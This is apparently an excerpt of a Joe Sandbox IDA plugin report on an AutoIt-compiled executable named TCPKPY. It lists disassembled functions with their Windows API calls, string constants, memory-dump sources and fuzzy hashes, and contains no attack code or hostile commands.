                                                                                                                • Opcode ID: 9d7b7bb4406a1dbc986360cf6e7a6a7efa3641d8b68bfab6b1626295bdc5013b
                                                                                                                • Instruction ID: 0274abe2da6f755f5df6f2418f0111a3421da091a4a84c3cfd8538b358f8dd42
                                                                                                                • Opcode Fuzzy Hash: 9d7b7bb4406a1dbc986360cf6e7a6a7efa3641d8b68bfab6b1626295bdc5013b
                                                                                                                • Instruction Fuzzy Hash: 60513730278301EBDB08DF14C89186ABB94BB65344F638A1AF456A71D2D7B0DE75DF42
                                                                                                                Function 0020C714 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 245COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __wcsnicmp
                                                                                                                • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                • API String ID: 1038674560-86951937
                                                                                                                • Opcode ID: 119ca77505d90cdbc4f7dad480d3abaf3295ae91e890f2e5dfd4478492454428
                                                                                                                • Instruction ID: 65a98d02f18b38ad65db655806a62f6bc8cc4e8a63c9e4f4a995c640569d0f02
                                                                                                                • Opcode Fuzzy Hash: 119ca77505d90cdbc4f7dad480d3abaf3295ae91e890f2e5dfd4478492454428
                                                                                                                • Instruction Fuzzy Hash: 23614BB1270312B7DB25EF609C82FFA72ACAF15340F244121F805A61C3EBA0DA35DA61
                                                                                                                Function 0026C4F9 Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 447windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 0026C598
                                                                                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0026C64E
                                                                                                                • SendMessageW.USER32(?,00001102,00000002,?), ref: 0026C669
                                                                                                                • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0026C925
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Window
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 2326795674-4108050209
                                                                                                                • Opcode ID: 988c13460319e8652a2255d3deee23819548f0eb13da5df8d9dfb7d457aa7838
                                                                                                                • Instruction ID: 6c3b6c2b88f10a69a7370c6e73c61df5bba2864975843c40a769afa7d293e662
                                                                                                                • Opcode Fuzzy Hash: 988c13460319e8652a2255d3deee23819548f0eb13da5df8d9dfb7d457aa7838
                                                                                                                • Instruction Fuzzy Hash: 59F10471225342AFE711AF24DC89BB6BBE8FF49354F240619F5D4922A1C774CCA4CB91
                                                                                                                Function 00266189 Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CharUpperBuffW.USER32(?,?,0029DBF0), ref: 00266245
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BuffCharUpper
                                                                                                                • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                                                • API String ID: 3964851224-45149045
                                                                                                                • Opcode ID: c5fddeb30229fddc358b70f4bf6d5269c1a33127ba9ddf7af45e44d00b1526df
                                                                                                                • Instruction ID: ddfd6632770963378f8d94603d05403b869a7eb1d4adf6db2b57eaee862df4d5
                                                                                                                • Opcode Fuzzy Hash: c5fddeb30229fddc358b70f4bf6d5269c1a33127ba9ddf7af45e44d00b1526df
                                                                                                                • Instruction Fuzzy Hash: 1EC193742342028BCB14EF14C555AAE77D6AF94390F584869B8925B397CF30DDBACF82
                                                                                                                Function 0026D385 Relevance: 39.2, APIs: 26, Instructions: 186windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetSysColor.USER32(00000012), ref: 0026D3BE
                                                                                                                • SetTextColor.GDI32(?,?), ref: 0026D3C2
                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 0026D3D8
                                                                                                                • GetSysColor.USER32(0000000F), ref: 0026D3E3
                                                                                                                • CreateSolidBrush.GDI32(?), ref: 0026D3E8
                                                                                                                • GetSysColor.USER32(00000011), ref: 0026D400
                                                                                                                • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0026D40E
                                                                                                                • SelectObject.GDI32(?,00000000), ref: 0026D41F
                                                                                                                • SetBkColor.GDI32(?,00000000), ref: 0026D428
                                                                                                                • SelectObject.GDI32(?,?), ref: 0026D435
                                                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 0026D454
                                                                                                                • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0026D46B
                                                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 0026D480
                                                                                                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0026D4A8
                                                                                                                • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0026D4CF
                                                                                                                • InflateRect.USER32(?,000000FD,000000FD), ref: 0026D4ED
                                                                                                                • DrawFocusRect.USER32(?,?), ref: 0026D4F8
                                                                                                                • GetSysColor.USER32(00000011), ref: 0026D506
                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 0026D50E
                                                                                                                • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0026D522
                                                                                                                • SelectObject.GDI32(?,0026D0B5), ref: 0026D539
                                                                                                                • DeleteObject.GDI32(?), ref: 0026D544
                                                                                                                • SelectObject.GDI32(?,?), ref: 0026D54A
                                                                                                                • DeleteObject.GDI32(?), ref: 0026D54F
                                                                                                                • SetTextColor.GDI32(?,?), ref: 0026D555
                                                                                                                • SetBkColor.GDI32(?,?), ref: 0026D55F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                • String ID:
                                                                                                                • API String ID: 1996641542-0
                                                                                                                • Opcode ID: 4b585d36ea1b80bef37c359ae36432afce4ce58082c384dc6e3e726a0295f2aa
                                                                                                                • Instruction ID: 2ed99fe7fffd6a3930c474543edb189eba16f6681da566e26447670511607350
                                                                                                                • Opcode Fuzzy Hash: 4b585d36ea1b80bef37c359ae36432afce4ce58082c384dc6e3e726a0295f2aa
                                                                                                                • Instruction Fuzzy Hash: 3E514B75901218AFDF10AFA4EC48EAE7BB9FF08320F104515F915AB2E1D77599548F50
                                                                                                                Function 0026B4D4 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 400windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0026B5C0
                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0026B5D1
                                                                                                                • CharNextW.USER32(0000014E), ref: 0026B600
                                                                                                                • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0026B641
                                                                                                                • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 0026B657
                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0026B668
                                                                                                                • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 0026B685
                                                                                                                • SetWindowTextW.USER32(?,0000014E), ref: 0026B6D7
                                                                                                                • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 0026B6ED
                                                                                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 0026B71E
                                                                                                                • _memset.LIBCMT ref: 0026B743
                                                                                                                • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0026B78C
                                                                                                                • _memset.LIBCMT ref: 0026B7EB
                                                                                                                • SendMessageW.USER32 ref: 0026B815
                                                                                                                • SendMessageW.USER32(?,00001074,?,00000001), ref: 0026B86D
                                                                                                                • SendMessageW.USER32(?,0000133D,?,?), ref: 0026B91A
                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 0026B93C
                                                                                                                • GetMenuItemInfoW.USER32(?), ref: 0026B986
                                                                                                                • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0026B9B3
                                                                                                                • DrawMenuBar.USER32(?), ref: 0026B9C2
                                                                                                                • SetWindowTextW.USER32(?,0000014E), ref: 0026B9EA
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 1073566785-4108050209
                                                                                                                • Opcode ID: 40d0ab1f777f0b86992cc85f2a93780b3960935319b77fea3f1a99939aaaf92c
                                                                                                                • Instruction ID: 3d852c166f882020acfd165302cf05f73a812ed9c566f690dc07c6137f7bd9ee
                                                                                                                • Opcode Fuzzy Hash: 40d0ab1f777f0b86992cc85f2a93780b3960935319b77fea3f1a99939aaaf92c
                                                                                                                • Instruction Fuzzy Hash: 0AE18075920219ABDF229F90DC84EEE7BB8EF05714F108156F919EB191DB708AE4CF60
                                                                                                                Function 0026744C Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetCursorPos.USER32(?), ref: 00267587
                                                                                                                • GetDesktopWindow.USER32 ref: 0026759C
                                                                                                                • GetWindowRect.USER32(00000000), ref: 002675A3
                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00267605
                                                                                                                • DestroyWindow.USER32(?), ref: 00267631
                                                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0026765A
                                                                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00267678
                                                                                                                • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 0026769E
                                                                                                                • SendMessageW.USER32(?,00000421,?,?), ref: 002676B3
                                                                                                                • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 002676C6
                                                                                                                • IsWindowVisible.USER32(?), ref: 002676E6
                                                                                                                • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00267701
                                                                                                                • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00267715
                                                                                                                • GetWindowRect.USER32(?,?), ref: 0026772D
                                                                                                                • MonitorFromPoint.USER32(?,?,00000002), ref: 00267753
                                                                                                                • GetMonitorInfoW.USER32 ref: 0026776D
                                                                                                                • CopyRect.USER32(?,?), ref: 00267784
                                                                                                                • SendMessageW.USER32(?,00000412,00000000), ref: 002677EF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                • String ID: ($0$tooltips_class32
                                                                                                                • API String ID: 698492251-4156429822
                                                                                                                • Opcode ID: 034dcf20d73a0134687e013d1984da707c16a35ad6bb62fb9bd6ec9346640f4d
                                                                                                                • Instruction ID: e479ee9c9724462bd611bd87d8f107352d30aadf0332bc614f61625170bb5c93
                                                                                                                • Opcode Fuzzy Hash: 034dcf20d73a0134687e013d1984da707c16a35ad6bb62fb9bd6ec9346640f4d
                                                                                                                • Instruction Fuzzy Hash: 92B19F71618301AFDB04DF64E948B6ABBE9FF88314F008A1DF5999B291DB70E854CF91
                                                                                                                Function 002476DB Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 178COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetFileVersionInfoSizeW.VERSION(?,?), ref: 002476ED
                                                                                                                • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00247713
                                                                                                                • _wcscpy.LIBCMT ref: 00247741
                                                                                                                • _wcscmp.LIBCMT ref: 0024774C
                                                                                                                • _wcscat.LIBCMT ref: 00247762
                                                                                                                • _wcsstr.LIBCMT ref: 0024776D
                                                                                                                • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00247789
                                                                                                                • _wcscat.LIBCMT ref: 002477D2
                                                                                                                • _wcscat.LIBCMT ref: 002477D9
                                                                                                                • _wcsncpy.LIBCMT ref: 00247804
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                                                • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                • API String ID: 699586101-1459072770
                                                                                                                • Opcode ID: 309850ccb79216c125ab6cfd43c9b45937460ed31e4b38ad5fb0bfce2d253217
                                                                                                                • Instruction ID: 3dc8f39c4fd6483e0c2c360605ed21ecea847a4c6a35d08dd78db4cb08434945
                                                                                                                • Opcode Fuzzy Hash: 309850ccb79216c125ab6cfd43c9b45937460ed31e4b38ad5fb0bfce2d253217
                                                                                                                • Instruction Fuzzy Hash: 1C413C71564210BADB04BBA0AC87EFFB7ACDF16710F100056F804A7093EB709A30DBA1
                                                                                                                Function 0021A756 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0021A839
                                                                                                                • GetSystemMetrics.USER32(00000007), ref: 0021A841
                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0021A86C
                                                                                                                • GetSystemMetrics.USER32(00000008), ref: 0021A874
                                                                                                                • GetSystemMetrics.USER32(00000004), ref: 0021A899
                                                                                                                • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0021A8B6
                                                                                                                • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 0021A8C6
                                                                                                                • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0021A8F9
                                                                                                                • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0021A90D
                                                                                                                • GetClientRect.USER32(00000000,000000FF), ref: 0021A92B
                                                                                                                • GetStockObject.GDI32(00000011), ref: 0021A947
                                                                                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 0021A952
                                                                                                                  • Part of subcall function 0021B736: GetCursorPos.USER32(000000FF), ref: 0021B749
                                                                                                                  • Part of subcall function 0021B736: ScreenToClient.USER32(00000000,000000FF), ref: 0021B766
                                                                                                                  • Part of subcall function 0021B736: GetAsyncKeyState.USER32(00000001), ref: 0021B78B
                                                                                                                  • Part of subcall function 0021B736: GetAsyncKeyState.USER32(00000002), ref: 0021B799
                                                                                                                • SetTimer.USER32(00000000,00000000,00000028,0021ACEE), ref: 0021A979
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                • String ID: AutoIt v3 GUI
                                                                                                                • API String ID: 1458621304-248962490
                                                                                                                • Opcode ID: 59b5027aae11af461fed507d1deffd3d0076a17c0a3dd5f8acd2e507f701ee89
                                                                                                                • Instruction ID: d3b278df4031bbf829c3d3e3d0deb885d4f3849d69074c0b9a28521f2b740fcc
                                                                                                                • Opcode Fuzzy Hash: 59b5027aae11af461fed507d1deffd3d0076a17c0a3dd5f8acd2e507f701ee89
                                                                                                                • Instruction Fuzzy Hash: 21B19A35A2120AAFDB14DFA8DC49BED7BB4BB08314F114229FA05A62E0D774D8A1CB51
                                                                                                                Function 0026352A Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00263626
                                                                                                                • RegCreateKeyExW.ADVAPI32(?,?,00000000,0029DBF0,00000000,?,00000000,?,?), ref: 00263694
                                                                                                                • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 002636DC
                                                                                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00263765
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00263A85
                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00263A92
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Close$ConnectCreateRegistryValue
                                                                                                                • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                • API String ID: 536824911-966354055
                                                                                                                • Opcode ID: feff6d2cab2a22e515915bea83d2414807b46cb19dea06e0cc7cb70fd34c3168
                                                                                                                • Instruction ID: 71db2c7b5850e45a8ea2206535fc3633800101ced5ce9fddbc24c97bca5d0f97
                                                                                                                • Opcode Fuzzy Hash: feff6d2cab2a22e515915bea83d2414807b46cb19dea06e0cc7cb70fd34c3168
                                                                                                                • Instruction Fuzzy Hash: CE024B75620602AFCB14EF14C895E2AB7E5FF89320F05855DF8899B2A2DB30ED61CF41
                                                                                                                Function 002669C5 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 281windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CharUpperBuffW.USER32(?,?), ref: 00266A52
                                                                                                                • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00266B12
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BuffCharMessageSendUpper
                                                                                                                • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                • API String ID: 3974292440-719923060
                                                                                                                • Opcode ID: 837cd8433713c3f7d54dd510f137427c8b9e949782b3461ffd050f4b57371d93
                                                                                                                • Instruction ID: e19a4b8c911854718957f6cd4af62d0f53fc163820c3a0e99e519fe8c7a69d74
                                                                                                                • Opcode Fuzzy Hash: 837cd8433713c3f7d54dd510f137427c8b9e949782b3461ffd050f4b57371d93
                                                                                                                • Instruction Fuzzy Hash: 0CA195702347019BCB04EF14C995AAAB3E5EF94354F144929B8A5AB3D3DB70EC65CF41
                                                                                                                Function 0023DD46 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 0023DD87
                                                                                                                • __swprintf.LIBCMT ref: 0023DE28
                                                                                                                • _wcscmp.LIBCMT ref: 0023DE3B
                                                                                                                • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0023DE90
                                                                                                                • _wcscmp.LIBCMT ref: 0023DECC
                                                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 0023DF03
                                                                                                                • GetDlgCtrlID.USER32(?), ref: 0023DF55
                                                                                                                • GetWindowRect.USER32(?,?), ref: 0023DF8B
                                                                                                                • GetParent.USER32(?), ref: 0023DFA9
                                                                                                                • ScreenToClient.USER32(00000000), ref: 0023DFB0
                                                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 0023E02A
                                                                                                                • _wcscmp.LIBCMT ref: 0023E03E
                                                                                                                • GetWindowTextW.USER32(?,?,00000400), ref: 0023E064
                                                                                                                • _wcscmp.LIBCMT ref: 0023E078
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                                                                                • String ID: %s%u
                                                                                                                • API String ID: 3119225716-679674701
